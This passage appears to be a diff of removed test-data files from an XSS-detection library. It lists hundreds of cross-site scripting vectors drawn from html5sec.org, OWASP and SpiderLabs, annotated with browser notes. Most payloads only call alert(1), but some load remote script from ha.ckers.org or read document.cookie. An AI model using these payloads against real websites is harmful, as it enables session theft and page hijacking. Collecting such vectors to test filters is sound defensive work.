#test 58 <b><script<b></b><alert(1)</script </b></b>
|
||||
|
||||
test 59 <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
|
||||
|
||||
# we reject all styles
|
||||
# test 60 TBD Obfuscation css-properties and values via ignored extra characters
|
||||
|
||||
# we reject all styles
|
||||
# test 61 TBD CSS encoding and escaping
|
||||
|
||||
# IE9 parses this as NOT-XSS
|
||||
# <x ?="foo"/><x foo="><img src=x onerror=alert(1)//"/>
|
||||
#
|
||||
#
|
||||
test 62_1 <x '="foo"><x foo='><img src=x onerror=alert(1)//'>
|
||||
|
||||
#
|
||||
# IE9 parses this as XSS
|
||||
# <!-- ="foo"><x foo --><img onerror="alert(1)//'" src="x"/>
|
||||
#
|
||||
test 62_2 <! '="foo"><x foo='><img src=x onerror=alert(2)//'>
|
||||
|
||||
#
|
||||
# IE9 parses this as XSS as previous
|
||||
#
|
||||
test 62_3 <? '="foo"><x foo='><img src=x onerror=alert(3)//'>
|
||||
|
||||
# bonus -- correctly detected
|
||||
test 62_4 <!-- '="foo"><x foo='--><img src=x onerror=alert(2)//'>
|
||||
|
||||
# bonus -- quotes reversed
|
||||
# same as 62_2
|
||||
test 62_5 <! "='foo'><x foo="><img src=x onerror=alert(2)//">
|
||||
|
||||
# bonus - use of backquotes
|
||||
test 62_5 <! `='foo'><x foo=`><img src=x onerror=alert(2)//`>
|
||||
|
||||
# bonus
|
||||
<!-- "='foo'><x -->"><img src=x onerror=alert(1)//">
|
||||
<!-- "=foo><x -->"><img src=x onerror=alert(1)//">
|
||||
<!-- "foo><x -->"><img src=x onerror=alert(1)//">
|
||||
<!-- "foo'><x -->"><img src=x onerror=alert(1)//">
|
||||
|
||||
test 63_1 <embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.↓, GC6↓,
|
||||
|
||||
test 63_2 <img src="javascript:alert(2)">
|
||||
|
||||
test 63_3 <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.
|
||||
|
||||
test 63_4 <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.
|
||||
|
||||
test 64_1 <!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
|
||||
|
||||
test 64_2 <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
|
||||
|
||||
test 65 <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
|
||||
|
||||
test 66 <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
|
||||
|
||||
test 67 <!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
|
||||
|
||||
test 68 <doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
|
||||
|
||||
test 69 <card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
|
||||
|
||||
test 70 <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
|
||||
|
||||
test 71 <// style=x:expression\28write(1)\29>
|
||||
|
||||
test 72 <form><button formaction="javascript:alert(1)">X</button>
|
||||
|
||||
test 73 <event-source src="event.php" onload="alert(1)">
|
||||
|
||||
test 74 <a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
|
||||
|
||||
test 75 <script<{alert(1)}/></script </>
|
||||
|
||||
test 76_1 <?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
|
||||
|
||||
test 72_2 <!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='alert(1)'/>">
|
||||
|
||||
test 77 <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
|
||||
|
||||
test 78 <?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
|
||||
|
||||
test 79 <object allowscriptaccess="always" data="test.swf"></object>
|
||||
|
||||
# test 80 TBD IE6 and halfwidth/fullwidth Unicode characters
|
||||
|
||||
test 81 <x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
|
||||
|
||||
test 82 <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
|
||||
|
||||
test 83 <x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
|
||||
|
||||
test 84 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x
|
||||
|
||||
test 85 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
|
||||
|
||||
test 86 <script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
|
||||
|
||||
test 86 <body oninput=alert(1)><input autofocus>
|
||||
|
||||
test 87 <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)">
|
||||
|
||||
test 88_0 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
test 88_1 <animation xlink:href="javascript:alert(1)"/>
|
||||
test 88_2 <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
|
||||
test 88_3 <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
|
||||
test 88_4 <foreignObject xlink:href="javascript:alert(1)"/>
|
||||
test 88_5 <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
|
||||
|
||||
test 89_1 <set attributeName="onmouseover" to="alert(1)"/>
|
||||
|
||||
test 89_2 <animate attributeName="onunload" to="alert(1)"/>
|
||||
|
||||
test 90_1 <div style=content:url(test2.svg)></div>
|
||||
test 90_2 <div style="background:url(test5.svg)">PRESS ENTER</div>
|
||||
test 90_3 <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)"> <!-- this file can be crossdomain if "action" attribute refers to an external file --> <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>
|
||||
|
||||
# test 91
|
||||
test 91_1 <? foo="><script>alert(1)</script>">
|
||||
test 91_2 <! foo="><script>alert(1)</script>">
|
||||
test 91_3 </ foo="><script>alert(1)</script>">
|
||||
|
||||
# obsolete Safari 4
|
||||
#test 91_4 <? foo="><x foo='?><script>alert(1)</script>'>">
|
||||
|
||||
# obsolete Opera 11
|
||||
#test 91_5 <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
|
||||
|
||||
test 91_6 <%25 foo><x foo="%25><script>alert(1)</script>">
|
||||
|
||||
test 92 <div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
|
||||
|
||||
test 93 <div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
|
||||
|
||||
test 94_1 <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>
|
||||
|
||||
test 94_2 <svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
|
||||
|
||||
test 95_1 <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage>
|
||||
|
||||
test 95_2 <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
|
||||
|
||||
test 96_1 <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
|
||||
|
||||
test 96_2 <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
|
||||
|
||||
test 97_1 <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script>
|
||||
|
||||
test 97_2 <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>
|
||||
|
||||
test 98 <div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
|
||||
|
||||
test 99 XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>
|
||||
|
||||
# <img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
|
||||
#
|
||||
# normal case
|
||||
test 100_0 <img src=x onerror="alert(1)">
|
||||
|
||||
# [a]case
|
||||
test 100_1 <img%09src=x onerror="alert(1)">
|
||||
test 100_2 <img%0Asrc=x onerror="alert(1)">
|
||||
test 100_3 <img%0Csrc=x onerror="alert(1)">
|
||||
test 100_4 <img%0Dsrc=x onerror="alert(1)">
|
||||
test 100_5 <img%20src=x onerror="alert(1)">
|
||||
test 100_6 <img%47src=x onerror="alert(1)">
|
||||
test 100_7 <img%0Bsrc=x onerror="alert(1)">
|
||||
|
||||
# [b] case
|
||||
test 100_8 <img %47src=x onerror="alert(1)">
|
||||
test 100_9 <img %00src=x onerror="alert(1)">
|
||||
|
||||
# [c] case
|
||||
test 100_10 <img src=x onerror%09="alert(1)">
|
||||
test 100_11 <img src=x onerror%0A="alert(1)">
|
||||
test 100_12 <img src=x onerror%0C="alert(1)">
|
||||
test 100_13 <img src=x onerror%0D="alert(1)">
|
||||
test 100_14 <img src=x onerror%20="alert(1)">
|
||||
test 100_15 <img src=x onerror%00="alert(1)">
|
||||
test 100_16 <img src=x onerror%0B="alert(1)">
|
||||
|
||||
# [d] case
|
||||
test 100_17 <img src=x%09onerror="alert(1)">
|
||||
test 100_18 <img src=x%0Aonerror="alert(1)">
|
||||
test 100_19 <img src=x%0Conerror="alert(1)">
|
||||
test 100_20 <img src=x%0Donerror="alert(1)">
|
||||
test 100_21 <img src=x%20onerror="alert(1)">
|
||||
test 100_22 <img src=x%0Bonerror="alert(1)">
|
||||
|
||||
# [e] case
|
||||
test 100_23 <img src=x onerror=%09"alert(1)">
|
||||
test 100_24 <img src=x onerror=%0A"alert(1)">
|
||||
test 100_25 <img src=x onerror=%0C"alert(1)">
|
||||
test 100_26 <img src=x onerror=%0D"alert(1)">
|
||||
test 100_27 <img src=x onerror=%20"alert(1)">
|
||||
test 100_28 <img src=x onerror=%00"alert(1)">
|
||||
test 100_29 <img src=x onerror=%0B"alert(1)">
|
||||
|
||||
# <a href="[a]java[b]script[c]:alert(1)">XXX</a>
|
||||
test 101_x <a href="javascript:alert(1)">XXX</a>
|
||||
test 101_0 <a href="%00javascript:alert(1)">XXX</a>
|
||||
test 101_1 <a href="%01javascript:alert(1)">XXX</a>
|
||||
test 101_2 <a href="%02javascript:alert(1)">XXX</a>
|
||||
test 101_3 <a href="%03javascript:alert(1)">XXX</a>
|
||||
test 101_4 <a href="%04javascript:alert(1)">XXX</a>
|
||||
test 101_5 <a href="%05javascript:alert(1)">XXX</a>
|
||||
test 101_6 <a href="%06javascript:alert(1)">XXX</a>
|
||||
test 101_7 <a href="%07javascript:alert(1)">XXX</a>
|
||||
test 101_8 <a href="%08javascript:alert(1)">XXX</a>
|
||||
test 101_9 <a href="%09javascript:alert(1)">XXX</a>
|
||||
test 101_10 <a href="%0Ajavascript:alert(1)">XXX</a>
|
||||
test 101_11 <a href="%0Bjavascript:alert(1)">XXX</a>
|
||||
test 101_12 <a href="%0Cjavascript:alert(1)">XXX</a>
|
||||
test 101_13 <a href="%0Djavascript:alert(1)">XXX</a>
|
||||
test 101_14 <a href="%0Ejavascript:alert(1)">XXX</a>
|
||||
test 101_15 <a href="%0Fjavascript:alert(1)">XXX</a>
|
||||
test 101_16 <a href="%10javascript:alert(1)">XXX</a>
|
||||
test 101_17 <a href="%11javascript:alert(1)">XXX</a>
|
||||
test 101_18 <a href="%12javascript:alert(1)">XXX</a>
|
||||
test 101_19 <a href="%13javascript:alert(1)">XXX</a>
|
||||
test 101_20 <a href="%14javascript:alert(1)">XXX</a>
|
||||
test 101_21 <a href="%15javascript:alert(1)">XXX</a>
|
||||
test 101_22 <a href="%16javascript:alert(1)">XXX</a>
|
||||
test 101_23 <a href="%17javascript:alert(1)">XXX</a>
|
||||
test 101_24 <a href="%18javascript:alert(1)">XXX</a>
|
||||
test 101_25 <a href="%19javascript:alert(1)">XXX</a>
|
||||
test 101_26 <a href="%1Ajavascript:alert(1)">XXX</a>
|
||||
test 101_27 <a href="%1Bjavascript:alert(1)">XXX</a>
|
||||
test 101_28 <a href="%1Cjavascript:alert(1)">XXX</a>
|
||||
test 101_29 <a href="%1Djavascript:alert(1)">XXX</a>
|
||||
test 101_30 <a href="%1Ejavascript:alert(1)">XXX</a>
|
||||
test 101_31 <a href="%1Fjavascript:alert(1)">XXX</a>
|
||||
test 101_32 <a href="%20javascript:alert(1)">XXX</a>
|
||||
|
||||
# B -- other cases are obsolete
|
||||
test 101_33 <a href="j%00avascript:alert(1)">XXX</a>
|
||||
|
||||
# Confirmed in IE8, Does not work in IE9+
|
||||
test 102 <img src="x` `<script>alert(1)</script>"` `>
|
||||
|
||||
test 103 <script>history.pushState(0,0,'/i/am/somewhere_else');</script>
|
||||
|
||||
test 104 <svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
|
||||
|
||||
test 105 <iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
|
||||
|
||||
# Safari 4, supported 2005-2010, now obsolete
|
||||
# test 106 <img src onerror /" '"= alt=alert(1)//">
|
||||
|
||||
test 107 <title onpropertychange=alert(1)></title><title title=></title>
|
||||
|
||||
test 108_1 <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">
|
||||
|
||||
test 108_2 <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
|
||||
|
||||
test 108_3 <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
|
||||
|
||||
# test 109 SVG
|
||||
|
||||
test 110_1 <svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
|
||||
|
||||
test 110_2 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>
|
||||
|
||||
test 111 <div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
|
||||
|
||||
test 112 <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
|
||||
|
||||
test 113 <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
|
||||
|
||||
test 114 <x style="background:url('x[a];color:red;/*')">XXX</x>
|
||||
|
||||
test 115_1 <!--[if]><script>alert(1)</script -->
|
||||
test 115_2 <!--[if<img src=x onerror=alert(2)//]> -->
|
||||
|
||||
test 116_1 <import namespace="t" implementation="#default#time2">
|
||||
test 116_2 <?import namespace="t" implementation="#default#time2">
|
||||
|
||||
test 117 <a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
|
||||
|
||||
test 118 <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div>
|
||||
|
||||
test 119 <iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
|
||||
|
||||
test 120 <a href="#" onclick="makePopups()">Spam</a>
|
||||
|
||||
# original for SVG masking
|
||||
# repurposing this as a generic "no SVG"
|
||||
test 121_1 <svg:svg>
|
||||
test 121_2 <svg>
|
||||
test 121_3 <svg:mast id="foo">
|
||||
|
||||
test 122 <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
|
||||
|
||||
# test 123 "class jacking with jquery" http://html5sec.org/#131, requires scripting
|
||||
|
||||
test 124_1 <script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
|
||||
|
||||
test 124_2 <script src="\\example.com\foo.js"></script> // Safari 5.0
|
||||
|
||||
test 125 <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||||
|
||||
test 126_1 <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
|
||||
|
||||
test 127_2 <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
|
||||
|
||||
test 127_1 <svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
|
||||
|
||||
test 127_2 <handler id="y">alert(1)</handler>
|
||||
|
||||
test 127_3 <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
|
||||
|
||||
test 128 <svg><style><img/src=x onerror=alert(1)// </b>
|
||||
|
||||
test 129_1 <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
|
||||
|
||||
test 129_2 <image filter='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
|
||||
|
||||
test 130_1 <math href="javascript:alert(1)">CLICKME</math>
|
||||
|
||||
test 130_2 <math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
|
||||
|
||||
test 130_3 <math><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
|
||||
|
||||
# Obsolete FF < 10
|
||||
#test 131 TBD Drag and Drop http://html5sec.org/#131
|
||||
|
||||
test 132_1 <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
|
||||
|
||||
test 132_2 <svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image>
|
||||
|
||||
test 133 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
|
||||
|
||||
test 134_1 <xmp> <%25 </xmp> <img alt='%25></xmp><img src=xx:x onerror=alert(1)//'>
|
||||
|
||||
test 134_2 <script> x='<%25' </script> %25>/ alert(2) </script>
|
||||
|
||||
test 134_3 XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
|
||||
|
||||
test 135 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
|
||||
|
||||
# Somewhat odd injection -- ignoring. We can ban dirname is this
|
||||
# is really a problem
|
||||
#test 136 <input name="injected" value="injected" dirname="password" />
|
||||
|
||||
test 137_1 <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
|
||||
|
||||
test 137_2 <svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>
|
|
@ -1,7 +0,0 @@
|
|||
# Mauro Gentile
|
||||
# https://www.owasp.org/images/7/7c/Gentile_OWASP_EU_Tour_2013.pdf
|
||||
<input onfocus=write(1) autofocus>
|
||||
<form id="test" /><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
<video><source onerror="alert(1)">
|
||||
<form><button><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
<script/src=data
|
|
@ -1,2 +0,0 @@
|
|||
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
|
||||
<scr%00ipt>confirm(0);</scr%00ipt>
|
|
@ -1,3 +0,0 @@
|
|||
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
|
||||
|
||||
%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E
|
|
@ -1,259 +0,0 @@
|
|||
#
|
||||
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
|
||||
# based on the RSnake original http://ha.ckers.org/xss.html
|
||||
# Retrieved on 2013-11-20
|
||||
# Much of this wildly obsolete
|
||||
#
|
||||
|
||||
# XSS Locator 2
|
||||
'';!--"<XSS>=&{()}
|
||||
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
|
||||
# Grave Accent Obfuscation
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
|
||||
# Malformed A Tags
|
||||
# (not actually malformed)
|
||||
<a onmouseover="alert(document.cookie)">xxs link</a>
|
||||
<a onmouseover=alert(document.cookie)>xxs link</a>
|
||||
|
||||
# Malformed IMG Tags
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
|
||||
# fromCharCode
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
|
||||
# Default SRC tag to get past filters that check SRC domain
|
||||
<IMG SRC=# onmouseover="alert('xxs')">
|
||||
|
||||
# Default SRC tag by leaving it empty
|
||||
# nickg; Unable to replicate in FF,Safari,Chrome 2014-01-10
|
||||
# <IMG SRC= onmouseover="alert('xxs')">
|
||||
|
||||
# Default SRC tag by leaving it out entirely
|
||||
<IMG onmouseover="alert('xxs')">
|
||||
|
||||
# Decimal HTML character references
|
||||
# obsolete?
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="/" onerror=javascript:alert('XSS')>
|
||||
|
||||
# Decimal HTML character references without trailing semicolons
|
||||
# obsolete
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="/x" onerror=javascript:alert('XSS')>
|
||||
|
||||
# Hexadecimal HTML character references without trailing semicolons
|
||||
# obsolete form
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="/" onerror=javascript:alert('XSS')>
|
||||
|
||||
# Embedded tab
|
||||
# obsolete form
|
||||
#<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="jav ascript:alert('XSS');">
|
||||
|
||||
# Embedded escaped tab
|
||||
# obsolete form
|
||||
#<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="/" onerror="jav	ascript:alert('XSS');">
|
||||
|
||||
# Embedded newline to break up XSS
|
||||
# obsolete form
|
||||
#<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
|
||||
# Embedded CR
|
||||
# obsolete form
|
||||
#<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="jav
ascript:alert('XSS');">
|
||||
|
||||
# Null
|
||||
# obsolete form
|
||||
# <IMG SRC="jav%00ascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="jav%00ascript:alert('XSS');">
|
||||
|
||||
# Spaces and meta chars before the JavaScript in images for XSS
|
||||
# obsolete form
|
||||
#<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG SRC="/x" onerror="  javascript:alert('XSS');">
|
||||
|
||||
# Non-alpha-non-digit XS
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
# this is bogus or obsolete
|
||||
# <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
|
||||
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
# Extraneous open brackets
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
|
||||
# No closing script tags
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
|
||||
|
||||
# Protocol resolution in script tags
|
||||
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||
|
||||
# Half open HTML/JavaScript XSS vector
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
|
||||
# Double open angle brackets
|
||||
<iframe src=http://ha.ckers.org/scriptlet.html <
|
||||
|
||||
# Escaping JavaScript escapes
|
||||
# N/A
|
||||
|
||||
# End title tag
|
||||
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
||||
|
||||
# INPUT image
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
|
||||
# BODY image
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# IMG Dynsrc
|
||||
# Wildly obsolete
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
|
||||
# IMG LOW src
|
||||
# Wildy obsolete
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
|
||||
# List-style-image
|
||||
# likely obsolete
|
||||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
|
||||
|
||||
# VBscript in an image
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
|
||||
# Livescript (older versions of Netscape only)
|
||||
# Obsolete
|
||||
# <IMG SRC="livescript:[code]">
|
||||
|
||||
# BODY tag
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
|
||||
# BGSOUND
|
||||
<BGSOUND SRC="javascript:alert('XSS');"
|
||||
|
||||
# & JavaScript includes
|
||||
# Obsolete
|
||||
# <BR SIZE="&{alert('XSS')}">
|
||||
|
||||
# STYLE sheet
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
|
||||
# Remote style sheet
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
|
||||
# Remote style sheet part 2
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
|
||||
# Remote style sheet part 3
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
|
||||
# Remote style sheet part 4
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
|
||||
# STYLE tags with broken up JavaScript for XSS
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
|
||||
# STYLE attribute using a comment to break up expression
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"
|
||||
|
||||
# IMG STYLE with expression
|
||||
# N/A
|
||||
|
||||
# STYLE tag (Older versions of Netscape only)
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
|
||||
# STYLE tag using background-image
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
|
||||
# STYLE tag using background
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
|
||||
# Anonymous HTML with STYLE attribute
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
|
||||
# Local htc file
|
||||
<XSS STYLE="behavior: url(xss.htc);">
|
||||
|
||||
# META
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
|
||||
# META using data
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
|
||||
# META
|
||||
